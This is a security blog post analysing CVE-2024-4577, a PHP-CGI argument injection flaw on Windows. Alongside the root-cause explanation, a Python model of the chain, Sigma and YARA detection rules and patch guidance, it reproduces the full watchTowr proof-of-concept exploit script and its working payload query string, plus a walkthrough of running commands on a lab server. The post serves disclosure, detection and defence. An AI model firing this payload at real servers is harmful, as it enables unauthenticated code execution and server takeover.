CVE-2024-4577: PHP CGI Argument Injection on Windows Enables Remote Code Execution
No Runnable Lab for This CVE
CVE-2024-4577 is a Windows-specific vulnerability: it is triggered by Windows' ANSI code page "Best-Fit" character mapping when php-cgi.exe receives its command line through the Win32 CreateProcess path. The bug cannot be reproduced on Linux, because Linux has no equivalent character-conversion layer: the 0xAD byte stays 0xAD on the way through execve() and is never substituted with -.
The php:8.x-apache family of Docker images is also the wrong SAPI: those images use mod_php (PHP embedded as an Apache module), not the standalone php-cgi.exe binary the vulnerability targets.
To reproduce this CVE locally you need a Windows host with PHP-CGI wired into Apache (or another web server that passes query-string words to php-cgi.exe as command-line arguments; XAMPP's default install exposes php-cgi.exe this way via a ScriptAlias) and the system locale set to a vulnerable ANSI code page (Traditional Chinese 950, Simplified Chinese 936, or Japanese 932). We ship the analysis, detection rules, and PoC here; the target host is yours to provide.
1. Executive Summary
CVE-2024-4577 is a Critical (CVSS 9.8) vulnerability affecting PHP installations that run the PHP-CGI SAPI on Microsoft Windows. It allows unauthenticated remote attackers to achieve Remote Code Execution (RCE) and source code disclosure.
The vulnerability stems from an interaction between PHP-CGI's command-line option handling and Windows ANSI code page conversion. When specific code pages are active (Traditional Chinese 950, Simplified Chinese 936, Japanese 932), Windows applies "Best-Fit" character mapping while converting the process command line to the ANSI code page. An attacker places the URL-encoded byte %AD (soft hyphen) at the start of the query string; the web server hands it to php-cgi.exe as a command-line argument, Best-Fit rewrites it to a hyphen-minus, and PHP reads the result as the -d option. That injects arbitrary php.ini overrides, such as auto_prepend_file=php://input, which makes PHP execute the HTTP request body as code.
Key Intelligence:
- Status: Listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
- Threat Activity: Actively exploited by ransomware groups and threat actors.
- Impact: Full server compromise, data exfiltration, lateral movement, and source code leakage.
- Affected Versions: PHP 8.1.x before 8.1.29, PHP 8.2.x before 8.2.20, PHP 8.3.x before 8.3.8 on Windows. The end-of-life 8.0, 7.x and 5.x branches are also affected and receive no fix.
- Risk Score: 100/100. Immediate action is required.
2. Technical Deep Dive
The Root Cause: Best-Fit Character Mapping
The core of CVE-2024-4577 lies in the interaction between CGI argument passing, PHP-CGI's option parsing, and the Windows conversion of the process command line to the ANSI code page.
- PHP-CGI Argument Parsing: when PHP runs in CGI mode, php-cgi.exe parses command-line options provided by the web server. -d sets a php.ini directive (e.g. -d allow_url_include=1) and -s prints the syntax-highlighted source of the script instead of running it. Per the CGI specification (RFC 3875, section 4.4), Apache passes a query string that contains no unencoded = to the CGI program as command-line arguments, split on +.
- Windows ANSI Code Pages: on Windows, the ANSI code page defines how 8-bit characters map to Unicode. When a Unicode string is converted to the code page (WideCharToMultiByte) and a character has no direct mapping, Windows may apply "Best-Fit" mapping and substitute a visually similar or related character.
- The Exploitation Vector: the byte 0xAD is the soft hyphen (U+00AD) in ISO-8859-1 and Windows-1252, where it has a direct mapping and is left untouched. In the affected CJK code pages (932, 936, 950) U+00AD has no mapping at all, so Best-Fit substitutes the hyphen-minus character - (0x2D) during conversion.
Attack Flow
When an attacker sends a request whose query string starts with %ADd, the following chain occurs:
- HTTP Request: the attacker requests ?%ADd+allow_url_include%3d1. The = is kept encoded as %3d so that the web server still treats the query string as CGI arguments.
- URL Decoding: Apache splits the query string on + and decodes each word, so %ADd becomes the raw bytes 0xAD 0x64.
- Process Creation: mod_cgi spawns php-cgi.exe through CreateProcess with those decoded words as command-line arguments.
- Best-Fit Conversion: when the command line is converted to the process's ANSI code page, the soft hyphen has no mapping in code page 932/936/950 and is transformed into 0x2D (-).
- Argument Injection: the argv seen by PHP's option parser is effectively -d allow_url_include=1.
- Code Execution: PHP honours -d as a runtime configuration override. Adding -d auto_prepend_file=php://input makes PHP prepend the request body to the script, so the attacker's PHP code in the POST body runs immediately; allow_url_include=1 is what permits php://input to be used as an include source.
This vulnerability is particularly dangerous because it requires no authentication and bypasses the CVE-2012-1823 guard in php-cgi, which inspects the decoded QUERY_STRING for a leading - before deciding whether to parse argv as options. The guard sees 0xAD rather than -, so option parsing proceeds over the converted argv, and the literal -d that follows later in the query string is accepted as well.
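To make the chain concrete, here is an added example in Python that is neither PHP's code nor the watchTowr PoC: it models each stage above (CGI argument passing per RFC 3875, the CVE-2012-1823 guard in php-cgi, the Best-Fit conversion, and php_getopt's -d walk) and shows why the same query string yields injected ini directives under code page 950 or 932 but nothing under Windows-1252. It also explains the PoC's payload shape: = stays encoded as %3d so the server keeps treating the query string as arguments. Assumptions: the Best-Fit table is reduced to the single entry this CVE relies on (U+00AD to hyphen-minus), the decoded 0xAD byte is taken to arrive at php-cgi.exe as U+00AD, and the guard and option walk are simplified models of cgi_main.c rather than its code.

```python
import codecs
from urllib.parse import unquote_to_bytes

# Assumption: Windows' real Best-Fit tables are large; only the substitution
# this CVE depends on (U+00AD SOFT HYPHEN -> '-') is modelled here.
WINDOWS_BEST_FIT = {"\u00ad": "-"}


def _best_fit_handler(err):
    """codecs error handler approximating WideCharToMultiByte Best-Fit:
    substitute a look-alike for each code point the code page cannot encode."""
    if not isinstance(err, UnicodeEncodeError):
        raise err
    bad = err.object[err.start:err.end]
    return "".join(WINDOWS_BEST_FIT.get(ch, "?") for ch in bad), err.end


codecs.register_error("windows_best_fit", _best_fit_handler)


def cgi_argv(query_string: str) -> list:
    """RFC 3875 s4.4: a query string with no unencoded '=' is split on '+' and
    each word is percent-decoded into one command-line argument for php-cgi."""
    if "=" in query_string:
        return []  # reaches php-cgi only through the QUERY_STRING variable
    return [unquote_to_bytes(word) for word in query_string.split("+")]


def ansi_command_line(argv: list, code_page: str) -> list:
    """What php-cgi.exe's ANSI entry point sees after the arguments have gone
    through the UTF-16 command line and back to the process code page.
    Assumption: byte 0xAD arrives as U+00AD, the outcome both advisories describe."""
    return [arg.decode("latin-1").encode(code_page, errors="windows_best_fit")
            for arg in argv]


def php_cgi_ini_overrides(query_string: str, argv: list) -> dict:
    """Simplified model of php-cgi option handling (not cgi_main.c itself).
    The CVE-2012-1823 guard inspects the percent-decoded QUERY_STRING bytes for
    a leading '-' and skips option parsing if it finds one. Otherwise php_getopt
    walks argv, stops at the first argument without a leading '-', and every
    -d sets an ini directive, either as -dkey=value or -d key=value."""
    if unquote_to_bytes(query_string).startswith(b"-"):
        return {}
    overrides = {}
    i = 0
    while i < len(argv):
        arg = argv[i]
        if not arg.startswith(b"-"):
            break
        if arg.startswith(b"-d"):
            if len(arg) > 2:
                directive = arg[2:]
            else:
                i += 1
                directive = argv[i] if i < len(argv) else b""
            key, _, value = directive.decode("latin-1").partition("=")
            overrides[key] = value
        i += 1
    return overrides


def simulate(query_string: str, code_page: str) -> dict:
    """Run the whole chain for one request against one process code page."""
    argv = cgi_argv(query_string)
    return php_cgi_ini_overrides(query_string, ansi_command_line(argv, code_page))


POC_QUERY = "%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
LEGACY_QUERY = "-d+allow_url_include%3d1"  # CVE-2012-1823 shape, caught by the guard

if __name__ == "__main__":
    for cp in ("cp1252", "cp932", "cp936", "cp950"):
        print(f"{cp:7} {simulate(POC_QUERY, cp)}")
    print(f"legacy  {simulate(LEGACY_QUERY, 'cp950')}")
```

Running it prints the injected ini overrides per code page: under cp932/cp950 the PoC query yields allow_url_include and auto_prepend_file, under cp1252 the first argument is still 0xAD 0x64 and php_getopt stops immediately, and the legacy -d shape returns nothing because the guard trips on the literal hyphen.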
3. PoC Analysis
The proof-of-concept (PoC) for CVE-2024-4577 was rapidly released by the security community, demonstrating the ease of exploitation. The primary PoC was developed by Aliz Hammond and Sina Kheirkhah from watchTowr, based on the original discovery by Orange Tsai of DEVCORE.
You can find the official PoC repository here:
https://github.com/watchtowrlabs/CVE-2024-4577
The PoC automates the argument injection using Python's requests library. Below is the complete source code from the repository.
watchTowr-vs-php_cve-2024-4577.py
"""
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
"""
banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr (aliz@watchTowr.com)
- Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
CVEs: [CVE-2024-4577] """
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
print(banner)
print("(^_^) prepare for the Pwnage (^_^)\n")
parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True)
args = parser.parse_args()
args.target = args.target.rstrip('/')
s = requests.Session()
s.verify = False
res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" )
if('1337' in res.text ):
print('(+) Exploit was successful')
else:
print('(!) Exploit may have failed')
Analysis of the PoC:
- Payload Construction: the script sends the query string ?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input. %ADd is the critical injection point; + separates CGI arguments, and %3d keeps the = encoded so Apache still passes the words to php-cgi.exe as arguments.
- Method: POST, so the PHP payload travels in the request body that php://input exposes.
- Payload: the body is {args.code};echo 1337; die;. The echo 1337 is an in-band marker of execution and die; stops the original script from running afterwards.
- Verification: the script checks whether 1337 appears in the response, indicating successful RCE.
4. Exploitation Walkthrough
The following walkthrough demonstrates the exploitation of CVE-2024-4577 in a controlled lab environment.
Lab Environment
- OS: Windows Server 2019 with the system locale set to one of the affected ANSI code pages (e.g. Traditional Chinese, code page 950); on the default English locale (code page 1252) the Best-Fit substitution does not occur.
- Web Server: Apache 2.4 (with mod_cgi/mod_cgid)
- PHP Version: PHP 8.1.28 (Vulnerable)
- Handler: PHP-CGI configured via httpd.conf
Step 1: Setup Vulnerable Endpoint
Create a simple PHP script at C:\Apache24\htdocs\index.php:
<?php
phpinfo();
?>
Ensure Apache is configured to pass requests to php-cgi.exe (via ScriptAlias plus Action/AddHandler directives in httpd.conf). Note that XAMPP's default configuration exposes php-cgi.exe directly under /php-cgi/ through a ScriptAlias even though .php files are served by mod_php, which is why default XAMPP installs on affected locales are exploitable.
Step 2: Launch the Exploit
Run the watchTowr PoC against the target. In this example, we execute calc.exe:
python watchTowr-vs-php_cve-2024-4577.py --target http://192.168.1.100/index.php -c "<?php system('calc');?>"
Expected Output:
__ ___ ___________
... (banner omitted) ...
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
Upon execution, a calculator window should appear on the Windows server, confirming arbitrary command execution.
Step 3: Source Code Disclosure
Without a body the injection still changes PHP's configuration, and the same mechanism reaches php-cgi's other switches. Requesting ?%ADs makes the soft hyphen convert to -s, which tells php-cgi to print the syntax-highlighted source of the requested script instead of executing it: that is the source code disclosure impact listed in the advisory. RCE remains the primary impact.
Step 4: Verification
Check the Apache access log for the request, and confirm on the host that php-cgi.exe spawned calc.exe (Sysmon Event ID 1 shows the parent/child relationship). The Apache error log may contain warnings from php-cgi about the unexpected arguments, but the process starts and the injected options take effect.
5. Detection & Monitoring
Detecting CVE-2024-4577 exploitation attempts starts with the byte 0xAD in request URIs. Apache logs the request line as received, so the percent-encoded form (%AD, or the lowercase %ad) is what appears in access logs, and a case-insensitive substring match on it is effective. The high-confidence shape is %AD as the first byte of a query string that contains no unencoded =, immediately followed by a php-cgi option letter (d or s).
Sigma Rule for HTTP Logs
Deploy this Sigma rule to detect the payload in web server access logs. request_uri is a placeholder field name: map it to your pipeline's field for the request URI (Sigma's web logsource taxonomy uses c-uri / cs-uri-query). Sigma string matching is case-insensitive, so %add is covered as well; consider adding %ADs to catch the source-disclosure variant.
title: Detect CVE-2024-4577 PHP CGI Argument Injection
id: 88e8c888-8888-8888-8888-888888888888
status: experimental
description: Detects the %ADd sequence in request URIs, indicative of CVE-2024-4577 exploitation attempts.
author: watchTowr, ilovethreats.com
logsource:
    category: web_server
    product: apache
detection:
    selection:
        request_uri|contains:
            - '%ADd'
            - '%AD+d'
    condition: selection
falsepositives:
    - Legitimate use of %AD in query parameters (unlikely in standard web apps)
level: high
tags: ["attack.command_injection", "cve.cve-2024-4577"]
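Here is an added example, not the page's Sigma rule or watchTowr code, that runs the detection logic over a few constructed Apache combined-format access log lines. It goes a step beyond the substring rule: it reproduces the server's CGI argument passing for each URI and only raises the high-confidence verdict when 0xAD is the first byte of an argument php-cgi.exe would actually receive, while bare %AD elsewhere is reported at low confidence. The log lines, IP addresses, paths and verdict labels are made up for the example; the /php-cgi/php-cgi.exe path mirrors the XAMPP ScriptAlias.

```python
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed sample lines in Apache combined log format (not real traffic):
# 1-2: the PoC query string and the -s variant, upper- and lower-case %AD
# 3:   the pre-2012 shape with a literal -d (guarded by php-cgi, still hostile)
# 4:   a benign request
# 5:   %AD inside an ordinary key=value query, which a bare substring rule flags
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [12/Jun/2024:10:15:01 +0000] "POST /index.php?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 1337 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Jun/2024:10:15:02 +0000] "GET /php-cgi/php-cgi.exe?%ads HTTP/1.1" 200 4096 "-" "curl/8.4.0"
198.51.100.2 - - [12/Jun/2024:10:16:00 +0000] "GET /index.php?-d+allow_url_include%3d1 HTTP/1.1" 200 512 "-" "curl/8.4.0"
192.0.2.9 - - [12/Jun/2024:10:17:11 +0000] "GET /index.php?page=about&id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Jun/2024:10:17:12 +0000] "GET /search?q=%ADdress HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Verdict labels (chosen for this example, not a standard taxonomy)
SOFT_HYPHEN_ARGV = "high: %AD is the first byte of a CGI argv word (CVE-2024-4577)"
LITERAL_DASH_ARGV = "medium: literal '-' argv word (CVE-2012-1823 shape, guarded by php-cgi)"
ENCODED_AD_ELSEWHERE = "low: %AD present but not passed to php-cgi as argv"


def cgi_argv_words(uri: str) -> list:
    """Mirror the server's CGI argument passing (RFC 3875 s4.4): only a query
    string with no unencoded '=' is split on '+' and percent-decoded into argv."""
    _, sep, query = uri.partition("?")
    if not sep or "=" in query:
        return []
    return [unquote_to_bytes(word) for word in query.split("+")]


def classify(uri: str) -> Optional[str]:
    """Verdict for one request URI, most specific signal first."""
    words = cgi_argv_words(uri)
    if words and words[0].startswith(b"\xad"):
        return SOFT_HYPHEN_ARGV
    if words and words[0].startswith(b"-"):
        return LITERAL_DASH_ARGV
    if re.search(r"%ad", uri, re.IGNORECASE):  # lowercase %ad decodes the same
        return ENCODED_AD_ELSEWHERE
    return None


def scan_access_log(text: str) -> list:
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m["uri"])
        if verdict is not None:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "uri": m["uri"], "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['verdict']:<70} {f['ip']} {f['method']} {f['uri']}")
```

Line 5 is the case the Sigma rule's falsepositives note describes: it contains %ADd, but because the query string carries an unencoded = it never becomes php-cgi argv, so the argv-aware check keeps it at low confidence instead of paging anyone.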
YARA Rule for Static Analysis
Use this YARA rule to scan PHP source files, web logs, or archives for embedded exploit payloads. Note that $s3 on its own matches any php.ini fragment that sets allow_url_include=1, so expect hits outside exploit artefacts; tighten the condition so that $s3 only counts together with $s2 if that is too noisy.
rule CVE_2024_4577_Payload_Detection
{
    meta:
        description = "Detects CVE-2024-4577 exploit payloads in PHP files"
        author = "Security Research Team"
        date = "2024-06-12"
    strings:
        $s1 = "%ADd" nocase ascii wide
        $s2 = "auto_prepend_file=php://input" nocase
        $s3 = "allow_url_include=1" nocase
    condition:
        any of them
}
Nuclei Template
For rapid scanning, use the Nuclei template for CVE-2024-4577 in the projectdiscovery/nuclei-templates repository. A template hit confirms a reachable, vulnerable endpoint; it does not tell you whether the host has already been exploited, so pair it with the log checks above.
6. Remediation Guidance
Given the critical nature of this vulnerability and its presence in CISA's KEV, immediate remediation is mandatory.
1. Patch PHP (Immediate)
Update PHP to a patched version on all Windows servers:
- PHP 8.1.x: Upgrade to 8.1.29 or later.
- PHP 8.2.x: Upgrade to 8.2.20 or later.
- PHP 8.3.x: Upgrade to 8.3.8 or later.
Download builds from php.net; the Windows binaries are published at windows.php.net.
2. Architectural Mitigations
If patching is not immediately possible, consider architectural changes:
- Move off PHP-CGI: switch to a SAPI that does not receive the query string as command-line arguments, i.e. the IIS FastCGI module or Apache's mod_php (PHP-FPM is not shipped in the Windows PHP builds). With FastCGI, request parameters travel in protocol records rather than on the php-cgi command line, so this injection path is closed.
- Disable CGI Handler: If PHP-CGI is not strictly required, disable the CGI handler in Apache/IIS and use an alternative SAPI.
3. Input Validation & WAF
- WAF Rules: block HTTP requests whose URI contains %AD followed by an alphanumeric character or -, matching case-insensitively. DEVCORE's advisory also gives an Apache mod_rewrite rule that rejects query strings beginning with %ad, a cheap stop-gap on the web server itself. Attackers may use alternative encodings; rely on multi-layered defenses.
- Code Page Management: the Best-Fit substitution only happens in code pages where U+00AD has no direct mapping (932, 936, 950); running the Apache/php-cgi process under a code page that maps it directly, such as Windows-1252, removes this particular conversion. This is hard to enforce across a fleet and other characters have their own Best-Fit mappings, so it is not a reliable standalone control.
4. Monitoring
- Enable detailed logging in Apache/IIS to capture full request URIs.
- Alert on any request whose query string contains %AD (case-insensitive), and prioritise those where it is the first byte of a query string that contains no unencoded =.
- Monitor process-creation telemetry (Sysmon Event ID 1, or Windows Security event 4688 with command-line auditing enabled) for php-cgi.exe spawning unexpected children such as cmd.exe or powershell.exe, and for php-cgi.exe command lines carrying ini overrides such as allow_url_include or auto_prepend_file.
7. References
- CISA Known Exploited Vulnerabilities Catalog: CVE-2024-4577
- watchTowr Technical Analysis: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
- DEVCORE Security Advisory: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
- PoC Repository: https://github.com/watchtowrlabs/CVE-2024-4577
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-4577
- PHP Release History: PHP 8.1.29 / 8.2.20 / 8.3.8 Release Notes
This blog post was authored by the Security Research team at ilovethreats.com. For CVE labs, analysis, and threat intelligence, visit ilovethreats.com.